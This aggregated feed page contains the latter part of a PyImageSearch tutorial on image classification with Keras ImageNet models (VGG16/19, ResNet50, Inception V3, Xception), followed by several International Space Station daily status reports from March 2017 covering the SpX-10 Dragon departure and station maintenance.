if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

# load the input image using the Keras helper utility while ensuring
# the image is resized to `inputShape`, the required input dimensions
# for the ImageNet pre-trained network
print("[INFO] loading and pre-processing image...")
image = load_img(args["image"], target_size=inputShape)
image = img_to_array(image)

# our input image is now represented as a NumPy array of shape
# (inputShape[0], inputShape[1], 3) however we need to expand the
# dimension by making the shape (1, inputShape[0], inputShape[1], 3)
# so we can pass it through the network
image = np.expand_dims(image, axis=0)

# pre-process the image using the appropriate function based on the
# model that has been loaded (i.e., mean subtraction, scaling, etc.)
image = preprocess(image)

# classify the image
print("[INFO] classifying image with '{}'...".format(args["model"]))
preds = model.predict(image)
P = imagenet_utils.decode_predictions(preds)

# loop over the predictions and display the rank-5 predictions +
# probabilities to our terminal
for (i, (imagenetID, label, prob)) in enumerate(P[0]):
        print("{}. {}: {:.2f}%".format(i + 1, label, prob * 100))

# load the image via OpenCV, draw the top prediction on the image,
# and display the image to our screen
orig = cv2.imread(args["image"])
(imagenetID, label, prob) = P[0][0]
cv2.putText(orig, "Label: {}, {:.2f}%".format(label, prob * 100),
        (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 2)
cv2.imshow("Classification", orig)
cv2.waitKey(0)

To see our pre-trained ImageNet networks in action, take a look at the next section.

VGGNet, ResNet, Inception, and Xception classification results

All examples in this blog post were gathered using Keras >= 2.0 and a TensorFlow backend. If you are using TensorFlow, make sure you are using version >= 1.0, otherwise you will run into errors. I’ve also tested this script with the Theano backend and confirmed that the implementation will work with Theano as well.

Once you have TensorFlow/Theano and Keras installed, make sure you download the source code + example images to this blog post using the “Downloads” section at the bottom of the tutorial.

From there, let’s try classifying an image with VGG16:

$ python classify_image.py --image images/soccer_ball.jpg --model vgg16

Figure 8: Classifying a soccer ball using VGG16 pre-trained on the ImageNet database using Keras (source).

Taking a look at the output, we can see VGG16 correctly classified the image as “soccer ball” with 93.43% probability.

To use VGG19, we simply need to change the --model command line argument:
$ python classify_image.py --image images/bmw.png --model vgg19

Figure 9: Classifying a vehicle as “convertible” using VGG19 and Keras (source).

VGG19 is able to correctly classify the input image as “convertible” with a probability of 91.76%. However, take a look at the other top-5 predictions: “sports car” with 4.98% probability (which the car is), “limousine” at 1.06% (incorrect, but still reasonable), and “car wheel” at 0.75% (also technically correct since there are car wheels in the image).

We can see similar levels of top-5 accuracy in the following example where we use the pre-trained ResNet architecture:

$ python classify_image.py --image images/clint_eastwood.jpg --model resnet

Figure 10: Using ResNet pre-trained on ImageNet with Keras + Python (source).

ResNet correctly classifies this image of Clint Eastwood holding a gun as “revolver” with 69.79% probability. It’s also interesting to see “rifle” at 7.74% and “assault rifle” at 5.63% in the top-5 predictions. Given the viewing angle of the revolver and the substantial length of the barrel (for a handgun), it’s easy to see how a Convolutional Neural Network would also return higher probabilities for a rifle.

This next example attempts to classify the species of dog using ResNet:

$ python classify_image.py --image images/jemma.png --model resnet

Figure 11: Classifying dog species using ResNet, Keras, and Python.

The species of dog is correctly identified as “beagle” with 94.48% confidence.

I then tried classifying the following image of Johnny Depp from the Pirates of the Caribbean franchise:

$ python classify_image.py --image images/boat.png --model inception

Figure 12: Classifying a ship wreck with Inception pre-trained on ImageNet with Keras (source).

While there is indeed a “boat” class in ImageNet, it’s interesting to see that the Inception network was able to correctly identify the scene as a “(ship) wreck” with 96.29% probability. The other predicted labels, including “seashore”, “canoe”, “paddle”, and “breakwater”, are all relevant, and in some cases absolutely correct as well.

For another example of the Inception network in action, I took a photo of the couch sitting in my office:

$ python classify_image.py --image images/office.png --model inception

Figure 13: Recognizing various objects in an image with Inception V3, Python, and Keras.

Inception correctly predicts there is a “table lamp” in the image with 69.68% confidence. The other top-5 predictions are also dead-on, including a “studio couch”, “window shade” (far right of the image, barely even noticeable), “lampshade”, and “pillow”.

In the context above, Inception wasn’t even used as an object detector, but it was still able to classify all parts of the image within its top-5 predictions. It’s no wonder that Convolutional Neural Networks make for excellent object detectors!

Moving on to Xception:

$ python classify_image.py --image images/scotch.png --model xception

Figure 14: Using the Xception network architecture to classify an image (source).

Here we have an image of scotch barrels, specifically my favorite scotch, Lagavulin. Xception correctly classifies this image as “barrels”.

This last example was classified using VGG16:

$ python classify_image.py --image images/tv.png --model vgg16

Figure 15: VGG16 pre-trained on ImageNet with Keras.

The image itself was captured a few months ago as I was finishing up The Witcher III: The Wild Hunt (easily in my top-3 favorite games of all time). The first prediction by VGG16 is “home theatre” — a reasonable prediction given that there is a “television/monitor” in the top-5 predictions as well.

As you can see from the examples in this blog post, networks pre-trained on the ImageNet dataset are capable of recognizing a variety of common day-to-day objects. I hope that you can use this code in your own projects!

What now?

Congratulations!

You can now recognize 1,000 separate object categories from the ImageNet dataset using pre-trained state-of-the-art Convolutional Neural Networks.

…but what if you wanted to train your own custom deep learning networks from scratch?

How would you go about it?

Do you know where to start?

Let me help:

Whether this is the first time you’ve worked with machine learning and neural networks or you’re already a seasoned deep learning practitioner, my new book is engineered from the ground up to help you reach deep learning expert status.

Summary

In today’s blog post we reviewed the five Convolutional Neural Networks pre-trained on the ImageNet dataset inside the Keras library:

  1. VGG16
  2. VGG19
  3. ResNet50
  4. Inception V3
  5. Xception

I then demonstrated how to use each of these architectures to classify your own input images using the Keras library and the Python programming language.

If you are interested in learning more about deep learning and Convolutional Neural Networks (and how to train your own networks from scratch), be sure to take a look at my upcoming book, Deep Learning for Computer Vision with Python, available for pre-order now.

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post ImageNet: VGGNet, ResNet, Inception, and Xception with Keras appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2mHUbXm
via IFTTT

ISS Daily Summary Report – 3/19/2017

Dragon was successfully released by the Space Station Remote Manipulator System (SSRMS) and is on its way to re-entry.  Splash down is scheduled for 9:50 am CDT.

from ISS On-Orbit Status Report http://ift.tt/2mkDEgz
via IFTTT

ISS Daily Summary Report – 3/18/2017

Dragon SpaceX (SpX)-10 Unberth: The crew packed critical items and egressed the vehicle in preparation for Dragon departure. Dragon was unberthed from the ISS via ground commanding at approximately 4:45 PM CST today. Ground teams have started maneuvering the Dragon into an IDA viewing position, followed by another maneuver about an hour and a half later to the overnight park position. Dragon release is planned tomorrow morning at 5:11 AM CST with splashdown approximately 5 hours later.

Double Cold Bag (DCB) Packing: The crew performed the final DCB packing of the samples planned for return on SpX-10. The crew transferred samples and Ice Bricks from the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI), General Laboratory Active Cryogenic ISS Experiment Refrigerator (GLACIER), Freezer-Refrigerator Of STirling cycle (FROST), and Space Automated Bioproduct Laboratory (SABL) into the DCBs. Warm samples and their conditioned Ice Bricks from MERLIN were packed into a Mini Cold Bag for SpX-10 return.

Today’s Planned Activities: All activities were completed unless otherwise noted. Weekly Housekeeping Double Coldbag Dragon Pack Cargo Transfer to Dragon Transfer Center Stack to Dragon Telephone Conference with the Russian Space Magazine Editor (S-band) Dragon Cargo Operations Conference СОЖ maintenance Dragon Egress in Preparation for Departure Node 2 Nadir CBM Control Panel Assembly (CPA) Installation USOS Window Shutter Close Dragon Vestibule Configuration for Demate Dragon/Node 2 VESTIBULE DEPRESS Closing Shutters on windows 6, 8, 9, 12, 13, 14 Dragon/Node 2 Vestibule MPEV Close

Completed Task List Items: Water Recovery System Waste Water Tank Drain

Ground Activities: All activities were completed unless otherwise noted. EPS ORU Refresh Dragon Unberth Operations IDA Viewing Dragon Overnight Park

Three-Day Look Ahead: Sunday, 03/18: Dragon Release, Housekeeping, Crew Off Duty. Monday, 03/19: USOS Crew Off Duty. Tuesday, 03/21: EVA Preps (Procedure Review/Conf, ROBoT, Safer Checkout, Airlock unstow).

QUICK ISS Status – Environmental Control Group:
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Standby
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): ReProcess
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2n65fBc
via IFTTT

ISS Daily Summary Report – 3/17/2017

Tracking and Data Relay Satellite (TDRS) 275 Failure: On Wednesday evening, White Sands Facility reported a timeout of the 275 satellite. This resulted in a loss of both S-band and Ku-band communications. The ISS team worked to fill comm gaps where possible. As of Friday, Network Specialists are still troubleshooting the issue with TDRS 275. Currently TDRS 275 is expected to return to operations on Monday. There have been no significant impacts to operations.

Dragon Departure Preparations: The crew completed a computer-based training session to review the Dragon departure documentation and a Robotic Onboard Trainer (ROBoT) session which included two simulated Dragon release runs. The crew have also successfully transferred Polar-1, Polar-2, Polar-3, and General Laboratory Active Cryogenic ISS Experiment Refrigerator (GLACIER)-5 to Dragon. All units are providing good data and are actively cooling.

SpX-10 Sample Return Preparations: In support of this weekend’s SpX-10 departure, the crew stowed NanoRacks Module 9, NanoRacks Platform 1, and the Simple Solar Neutron Detector. This morning, the crew moved the temporarily stowed APEX-04 Kennedy Space Center (KSC) Fixation Tube (KFT) to the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for conditioning prior to tomorrow’s Double Cold Bag packing.

At Home In Space Questionnaire: The crew attempted to answer the second of two At Home in Space questionnaires; however, due to issues with the app, the crew was unable to complete the questionnaire. Ground teams are looking into the issue. The Canadian Space Agency (CSA) experiment, At Home in Space, assesses culture, values, and psychosocial adaptation of astronauts to a space environment shared by multinational crews on long-duration missions. It is hypothesized that astronauts develop a shared space culture that is an adaptive strategy for handling cultural differences, and that they deal with the isolated confined environment of the spacecraft by creating a home in space. At Home In Space uses a questionnaire to investigate individual and culturally related differences, family functioning, values, coping with stress, and post-experience growth.

Japanese Experiment Module (JEM) Remote Manipulator System (RMS): Overnight, Ground Robotics Controllers activated the JEMRMS and stowed the Small Fine Arm (SFA) on the SFA Storage Equipment (SSE). They then deactivated the JEMRMS. Next Tuesday, the JEMRMS will grapple the JEM Exposed Facility (EF). The crew removed the Launch Lock and Mount, performed a sharp edge inspection, and performed a fit check of the Wrist Vision Equipment (WVE) camera. These tasks are in preparation for changeout of the JEMRMS WVE camera planned during the Extravehicular Activity (EVA) on March 24, 2017.

Advanced Resistive Exercise Device (ARED) Flywheel Set Screw Tightening: There are 4 flywheels in ARED that provide inertial smoothing of an exercise cycle, avoiding a jerky exercise cycle. Each flywheel has 2 set screws that are torqued annually. The two flywheels for the left ARED cylinder each had 1 of 2 set screws whose torque could not be verified because the torque wrench would not fit. A redesigned tool was flown on HTV6 and used yesterday to successfully torque all 8 set screws.

Robotic Work Stations (RWS) Remote Power Controller Module (RPCM) Failure: Today, during checkout of the Lab and Cupola RWS, RPCM LAS52A3B-A RPC-4 would not close. This RPC powers Common Video Interface Unit (CVIU)-4 for the Cupola RWS. Investigation of the signature indicates it is an FET Controller Hybrid (FCH) failure and must be Removed and Replaced (R&R’d). During the investigation, ground teams uncovered that RPC 1 may have a similar failure, and the Video Tape Recorder (VTR)-2 load on this RPC was previously declared failed. R&R of this RPCM has minimal powerdown impacts and is easily accessed. The result of this failure is that only 2 of 3 Cupola RWS monitors are available. Only 2 RWS monitors are required for Visiting Vehicle capture and release. Additionally, a PCS (Portable Computer System) can be deployed in the Cupola for a third monitor if desired. There is no impact to the upcoming Extravehicular Activities (EVAs) since these robotic operations are ground controlled. Ground teams are evaluating R&R of RPCM LAS52A3B-A next week.

Today’s Planned Activities: All activities were completed unless otherwise noted. IMS Tagup Payload Stowage Reconfiguration Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Setup APEX-04 MELFI Sample Insertion PILOT-T. Preparation for the experiment. Nikon still camera sync with station time Polar Express Rack Uninstall, Transfer, Handover and Dragon install Polar Express Rack Uninstall, Transfer and Handover PILOT-T. Experiment Ops. At Home In Space Questionnaire [Aborted] Vacuum cleaning ventilation grille on FGB interior panels (201, 301, 401) On-board Training (OBT) Dragon Departure Review MRM1-FGB Screw Clamp Tightening RELAKSATSIYA Hardware Setup. Glacier #5 Dragon Transfer On-board Training (OBT) Dragon Robotics Onboard Trainer (ROBoT) Release RELAKSATSIYA. Parameter Settings Adjustment Polar Express Rack Uninstall, Transfer, and Dragon Install RELAKSATSIYA. Observation RELAKSATSIYA. Closeout Ops and Hardware Removal Rodent Research. Cleaning Rodent access module PAO Preparation Strata Status Check Public Affairs Office (PAO) High Definition (HD) Config JEM Setup PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – JEM Recharging Soyuz 732 Samsung PC Battery (if charge level is below 80%) Photo/TV Photo/TV, Checking Camcorder Settings Double Coldbag Pack Review Long Duration Sorbent Testbed Status Check. Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout NanoRacks Platform-1 Modules Removal Rodent Research. Stowage of Habitat Module MELFI Sample Insertion into a Box Module NanoRacks Module 9 Ops Session 5 Simple Solar Neutron Detector Hardware Stow Dragon Vestibule Outfitting Kit (VOK) Gather Double Coldbag Pack Review JEM Remote Manipulator System Wrist Vision Equipment (WVE) Z-93 Precautionary Unpack Space Headaches – Weekly Questionnaire Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Stow JEMRMS Wrist Vision Equipment (WVE) Preparation for EVA. СОЖ Maintenance В3 Fan Screen Cleaning in MRM2 JEM Remote Manipulator System Wrist Vision Equipment EVA Tool Configuration Rodent Research. Stowage of Habitat Module JEM Remote Manipulator System Wrist Vision Equipment (WVE) Z-93 Stow PCG-5 Hardware Deactivation and Stow PCG-5 Hardware Photography Pressurized Mating Adapter 3 (PMA 3) Leak Check Term IMS Update Terminate Soyuz 732 Samsung PC Battery Recharge (if necessary) Rodent […]

from ISS On-Orbit Status Report http://ift.tt/2nrOGR7
via IFTTT